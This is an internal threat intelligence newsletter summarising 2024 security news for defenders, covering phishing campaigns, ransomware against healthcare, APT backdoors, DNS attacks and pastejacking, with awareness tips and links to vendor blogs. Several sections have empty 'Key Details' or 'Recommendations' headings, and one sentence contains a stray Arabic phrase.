This is a monthly threat intelligence newsletter with a lean towards phishing and healthcare I put together for the team at my company. Feel free to grab and share with your own internal team.
Threat Intelligence Newsletter: Resurgence of Russia's Fin7
Overview: The notorious cybercrime group Fin7, previously thought to be dismantled, has re-emerged with increased activity. This resurgence is primarily facilitated by Stark Industries Solutions, a hosting provider linked to Russian cyberattacks.
Key Developments:
Infrastructure: Fin7 now operates over 4,000 hosts, using tactics like typosquatting, booby-trapped ads, and phishing domains.
Implications: Organizations must heighten vigilance against phishing, regularly update security protocols, and monitor for suspicious domain activities.
For more details, visit Krebs on Security.
New Internet Explorer Zero-Day Spoofing Attack (CVE-2024-38112)
Overview: Check Point Research (CPR) has identified a new zero-day spoofing vulnerability in Internet Explorer, designated CVE-2024-38112. This vulnerability allows attackers to deceive users by displaying a fake website address in the browser's address bar, facilitating phishing and other malicious activities.
Key Details:
Recommendations:
For further information, visit the Check Point Blog.
Ransomware Attack Disrupts U.K. Health Service Laboratory
Overview: A ransomware attack on Synnovis, a laboratory partner for several major London hospitals, has significantly disrupted health services. The Qilin ransomware group, utilizing a Ransomware-as-a-Service model, is behind the attack and also targets U.S. based organizations. After failing to receive a ransom payment, Qilin released over 400GB of private healthcare data online.
Key Points:
Recommendations:
For more information, visit the KnowBe4 Blog.
Microsoft Links Scattered Spider Hackers to Qilin Ransomware Attacks
Microsoft has identified the Scattered Spider cybercrime group, also known as Octo Tempest, as responsible for recent Qilin ransomware attacks. This financially motivated group has been active since 2022, targeting over 130 high-profile organizations using tactics such as phishing, MFA bombing, and SIM swapping. The Qilin ransomware group, known for targeting VMware ESXi virtual machines, employs double-extortion attacks by threatening to release stolen data.
Key Takeaways:
For more details, read the full article from Bleeping Computer.
Social Media Job Scams: Don't Be the Target!
Hunting for your dream job online? Unfortunately, social media can be a breeding ground for scammers who target unsuspecting job seekers. But fear not! Here are some key takeaways to help you avoid falling victim to their schemes:
Be wary of unsolicited offers, especially those that come through social media. Legitimate recruiters typically only contact you if you've applied for a position or if they have a referral from someone you know. If you receive a message out of the blue about a fantastic opportunity, proceed with caution.
Watch out for unprofessional communication. Typos, grammatical errors, and requests for money upfront are all major red flags. Legitimate companies will communicate professionally and will never ask you to pay for a job interview or training.
Suspicious of remote jobs with high salaries? You should be! Scammers often lure people in with the promise of a high-paying work-from-home position. If something sounds too good to be true, it probably is. But that doesn't mean there aren't real remote work opportunities out there. Do your research to ensure the company is legitimate before getting your hopes up.
Don't be afraid to investigate! Before you apply for any job, take some time to research the company. Look for online reviews, check their website for legitimacy, and see if they have a social media presence with a good following. A little detective work can go a long way in weeding out imposters.
Keep your personal information private. This includes your Social Security number, bank account number, and credit card number. Never share this information with someone you don't know and trust, especially through social media or email.
Be cautious about clicking on links or attachments. Phishing emails and messages are a common tactic used by scammers. If you receive a message from an unknown sender about a job opportunity, don't click on any links or attachments. Instead, go directly to the company's website to see if the job is listed there.
By following these tips, you can protect yourself from social media job scams and increase your chances of finding a legitimate and rewarding job opportunity. Remember, if it seems too good to be true, it probably is. So, be cautious, be smart, and happy hunting! For more details check out the KnowBe4 blog.
Phishing Alert: Microsoft Top Target, Social Media on the Rise
According to a recent Check Point Research report, Microsoft was the most imitated brand for phishing attacks in Q2 2024, accounting for over half of all attempts. This highlights the ongoing threat of brand phishing, where cybercriminals impersonate well-known companies to trick users into revealing personal information or clicking on malicious links.
The report also reveals new entries to the top 10 most impersonated brands, including Adidas, WhatsApp, and Instagram. This trend indicates a shift in cybercriminals' tactics, as they target social media and technology companies that hold valuable user data.
Top 10 Most Impersonated Brands in Q2 2024
Microsoft (57%)
Apple (10%)
LinkedIn (7%)
Google (6%)
Facebook (1.8%)
Amazon (1.6%)
DHL (0.9%)
Adidas (0.8%)
WhatsApp (0.8%)
Instagram (0.7%)
Check out Check Point’s blog for more details.
New Backdoor Used by APT41: MoonWalk
A recent blog post by Zscaler details a new backdoor tool called MoonWalk المستخدمة من قبل مجموعة APT41 (used by the APT41 group). MoonWalk is a tool used by the APT41 threat group for espionage. The article discusses MoonWalk’s technical aspects, including its use of Google Drive for communication and Windows Fibers for evasion. MoonWalk also uses a modular design, allowing attackers to customize it for different situations.
Here are some key takeaways from a threat intelligence perspective:
Organizations should be aware of the MoonWalk backdoor and take steps to protect themselves, such as:
By following these steps, organizations can help to mitigate the risk of being targeted by APT41 and other threat groups.
You can read more about MoonWalk here.
Phish-Friendly Domain Registry ".top" Put on Notice
The ".top" domain registry, managed by Jiangsu Bangning Science & Technology Co. Ltd., has been warned by ICANN for its failure to address phishing abuse. Findings revealed that over 4% of new ".top" domains from May 2023 to April 2024 were used for phishing. ICANN's notice demands immediate improvements, or the registry risks losing its license. This highlights the critical need for vigilant monitoring and prompt action against domain abuse to protect users from phishing threats.
For more information, read the full article on Krebs on Security.
Over 3,000 GitHub Accounts Exploited in Malware Distribution Scheme
Summary: A new threat, dubbed 'Stargazers Ghost Network,' involves over 3,000 GitHub accounts used to distribute information-stealing malware via fake repositories. Discovered by Check Point Research, this Distribution-as-a-Service (DaaS) leverages GitHub’s reputation to spread infostealers like RedLine and Lumma Stealer. Despite GitHub's efforts, over 200 malicious repositories remain active.
Key Takeaway:
Operation: Accounts serve phishing templates, images, and malware, maintaining resilience even after takedowns.
For more information, read the full article on BleepingComputer.
North Korean Operative Infiltrates KnowBe4 Using Stolen Identity
Summary: KnowBe4 recently revealed that a North Korean hacker, posing as a U.S. citizen, successfully got hired as an IT worker. Despite multiple rounds of interviews and background checks, the individual was detected attempting to install malware on their new workstation. No sensitive data was accessed due to robust security measures.
Key Takeaways:
Recommendations: Regularly review and update hiring and onboarding procedures to mitigate risks from sophisticated threat actors.
For more information, read the full article on KnowBe4 Blog.
Exploiting CrowdStrike Outage: Phishing, Fake Scripts, and Social Engineering
Summary: Following a recent CrowdStrike update that caused widespread blue screen of death (BSOD) errors, cybercriminals are capitalizing on the confusion. Fake PowerShell scripts, phishing domains, and social engineering attacks are proliferating, posing significant risks.
Key Takeaways:
Recommendations: Verify the authenticity of scripts and domains, and educate users on phishing and social engineering tactics.
For more information, read the full article on ReliaQuest Blog.
Huntress Foils a Medical Software Update Hack
Huntress recently uncovered a sophisticated phishing campaign targeting medical software updates. Cybercriminals created a fake version of a legitimate medical image viewer, embedding malicious code that established a secret connection back to the attackers. This attack highlights the critical need for vigilance even when dealing with trusted sources. Huntress's Security Operations Center (SOC) detected the anomaly and quickly isolated the threat, preventing potential data breaches.
Key Takeaways:
For more details, visit Huntress's blog.
TuDoor: Exploiting DNS Logic Vulnerabilities
A new DNS attack method, named TuDoor, has been identified, highlighting critical vulnerabilities in DNS response pre-processing. Attackers can use malformed DNS response packets to execute cache poisoning, denial-of-service, and resource exhaustion attacks. TuDoor impacts 24 mainstream DNS software and many public DNS services, potentially affecting millions of users.
Key Takeaways:
Be aware of the TuDoor attack method.
Ensure DNS software is up-to-date with patches.
Monitor for unusual DNS traffic patterns.
For more details, visit TuDoor's website.
Generative AI Tools: New Target for Scammers
Recent intelligence highlights a surge in cyber threats exploiting interest in generative AI tools, particularly ChatGPT. Scammers are registering suspicious domains containing keywords like "gpt" and "prompt engineering," aiming to deceive users with phishing schemes and malware distribution. This trend coincides with major AI-related announcements, increasing the risk to individuals and organizations exploring these technologies.
Key Insights:
For more details, visit KnowBe4's Blog.
OneDrive Pastejacking: A New Phishing Tactic
A new phishing threat, "pastejacking," targets OneDrive users by exploiting the copy-paste functionality. Attackers inject malicious commands into users' clipboards through seemingly benign text or files. This method can lead to unauthorized data access or malware installation when unsuspecting users paste the copied content.
Key Insights:
For more details, visit Trellix's Blog.